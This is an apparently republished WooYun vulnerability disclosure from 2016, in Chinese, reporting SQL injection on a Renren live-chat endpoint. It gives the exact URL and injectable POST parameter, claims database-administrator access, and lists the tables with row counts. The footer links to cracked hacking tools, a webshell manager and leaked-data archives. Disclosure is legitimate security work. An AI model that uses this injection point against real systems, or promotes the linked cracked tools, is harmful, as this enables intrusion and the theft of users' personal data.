人人网某处SQL注入影响大量数据
- 发表于
- WooYun漏洞库
- 316 阅读
漏洞概要
缺陷编号:WooYun-2016-0222273
漏洞标题:人人网某处SQL注入影响大量数据
相关厂商:人人网
漏洞作者:路人甲
提交时间:2016-06-23 12:21
公开时间:2016-06-24 12:19
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
漏洞详情
披露状态:
2016-06-23: 细节已通知厂商并且等待厂商处理中
2016-06-24: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
RT
详细说明:
1 | http://live800.wan.renren.com:80/live800//sta/export/chatOpSta.jsp (POST)export=txt&companyId=1&subStrSql=* |
dba权限
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 | Database: live800_im<br> +---------------------+---------+<br> | Table | Entries |<br> +---------------------+---------+<br> | visitor_access | 15081675 |<br> | operator_status | 633129 |<br> | chat_topic | 616252 |<br> | live800_system | 410676 |<br> | chat_content | 289363 |<br> | chat_sta | 289308 |<br> | chat_info | 285963 |<br> | leaveword_topic | 161506 |<br> | trustful_visitor | 78942 |<br> | leaveword | 74624 |<br> | contact | 71702 |<br> | cookie_contact | 71702 |<br> | company_config_data | 69254 |<br> | lost | 51034 |<br> | sync_info | 23170 |<br> | op_chat_content | 7200 |<br> | daily_flow_capacity | 1329 |<br> | sys_operate_log | 1266 |<br> | faq | 115 |<br> | operator | 82 |<br> | privilege | 82 |<br> | company_config | 36 |<br> | user_defined_button | 18 |<br> | company_ui_config | 16 |<br> | config_template | 12 |<br> | user_invite | 12 |<br> | company_skill | 11 |<br> | ad_column | 10 |<br> | routing_action | 6 |<br> | chat_config | 4 |<br> | leaveword_box | 3 |<br> | notify | 3 |<br> | routing_condition | 3 |<br> | routing_policy | 3 |<br> | routing_rule | 3 |<br> | canned_url | 1 |<br> | company | 1 |<br> | company_style | 1 |<br> | customization | 1 |<br> | fuf | 1 |<br> | ip_prohibit | 1 |<br> | operator_account | 1 |<br> +---------------------+---------+ |
漏洞证明:
修复方案:
改改改
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2016-06-2412:19
厂商回复:
忽略
最新状态:
暂无
评价
- 2010-01-01 00:00 大师兄 白帽子 | Rank:0 漏洞数:0)
又有新裤子出来了。。
2010-01-01 00:00 _Thorns 白帽子 | Rank:796 漏洞数:60)......跟我的重复了
2010-01-01 00:00 寒 白帽子 | Rank:0 漏洞数:0).
原文连接:人人网某处SQL注入影响大量数据 所有媒体,可在保留署名、原文连接的情况下转载,若非则不得使用我方内容。
- BurpSuite pro v2.1破解版burp-loader-keygen
- BurpSuite自动化blind-xss插件:Femida-xss
- SQLi Dumper v9.9.6破解版
- 魔兽争霸RPG地图破解/解密工具:X-deprotect
- Google Adsense全新的自动广告功能
- PHP 7.0-7.3 disable_functions bypass
- 身份证丢失后怎么办?身份证安全指南
- 魔兽争霸RPG地图破解/解密三剑客
- Tor Browser 9更新了,Tor矛与盾的矛盾
- 解决 macOS Catalina 已损坏无法打开
- SQLi Dumper v9.8.4破解版/SQL注入工具
- Charles 4.5.1逆向工程/破解
- 目录/文件/DNS/VHost暴力破解工具:Gobuster
- PHP-FPM 远程代码执行漏洞(CVE-2019-11043)
- 使用XOR异或绕过WAF拦截:XORpass
- 2019/2020 Google镜像大全,谷歌镜像网址
- BT磁力搜索引擎大全
- 暗网是什么?如何进入暗网?
- 最新ESET NOD32 License Key/激活码/许可证密钥/用户名密码
- 谷歌识图,以图搜图
- 【透明互联网】社工库 Social Engineering Data
- 思维导图v9.1.157注册码
- 社工库源码大全(持续更新)
- No Access-Control-Allow-Origin 跨域错误解决
- this channel is blocked because it was used:Telegram群组/频道屏蔽解决方法
- Google SQL 注入搜索列表
- npm install慢/无响应解决方案
- 谷歌访问助手破解版
- “冰蝎”动态二进制加密网站管理客户端 – WebShell管理工具
- 手机BT/种子下载,手机磁力链下载软件整理
扫码分享
验证:
体验盒子扫码分享
打赏零钱
